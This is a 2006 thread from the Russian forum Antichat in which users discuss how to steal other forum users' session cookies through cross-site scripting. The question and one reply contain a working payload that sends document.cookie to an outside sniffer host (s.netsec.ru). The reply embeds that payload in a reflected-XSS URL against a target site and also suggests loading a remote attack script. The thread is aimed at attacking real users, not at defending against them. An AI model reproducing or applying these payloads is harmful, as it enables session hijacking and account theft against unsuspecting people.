Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
23.03.2006, 17:22
|
|
Познающий
Регистрация: 04.12.2005
Сообщений: 52
Провел на форуме:
184032
Репутация:
1
|
|
Ipb не скрипт, а ссылка
у меня вопрос, можно ли сделать так, чтобы XSS
Код:
<script>img = new Image(); img.src = "http://s.netsec.ru/blablabla/pic.gif?"+document.cookie;</script>
выполнялся не через отправку сообщения "Жалоба", а после нажатия на ссылку, оставленную в простом сообщении???
или надо сделать страницу на php, с каким-то ещё методом....
вообщем, нужно, чтобы при нажатии на сылку приходила на сниффер таже инфа (можно чтобы больше приходило....), что и при обычном использовании XSS.... |
|
|
23.03.2006, 17:47
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233
Репутация:
2726
|
|
вообщем, нужно, чтобы при нажатии на сылку приходила на сниффер таже инфа (можно чтобы больше приходило....), что и при обычном использовании XSS....
<a href=... onclick="javascript :...">ссылка</a>
Нельзя.
|
|
|
|
23.03.2006, 18:43
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
Если тебе нужна просто ссылка то можно если там есть пассивный XSS. Например _http://target.com/search.php?string=что нибудь на русском<script>img = new Image(); img.src = "http://s.netsec.ru/blablabla/pic.gif?"+document.cookie;</script> либо <script src=http://zzzzzz.com/xss.js?<b>Но это на ламёров.
Ещё можно попробовать так http://forum.antichat.ru/thread9910-explorer.html |
|
|
|
23.03.2006, 21:03
|
|
Познающий
Регистрация: 04.12.2005
Сообщений: 52
Провел на форуме:
184032
Репутация:
1
|
|
спасибо, буду разбираться и думать....
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
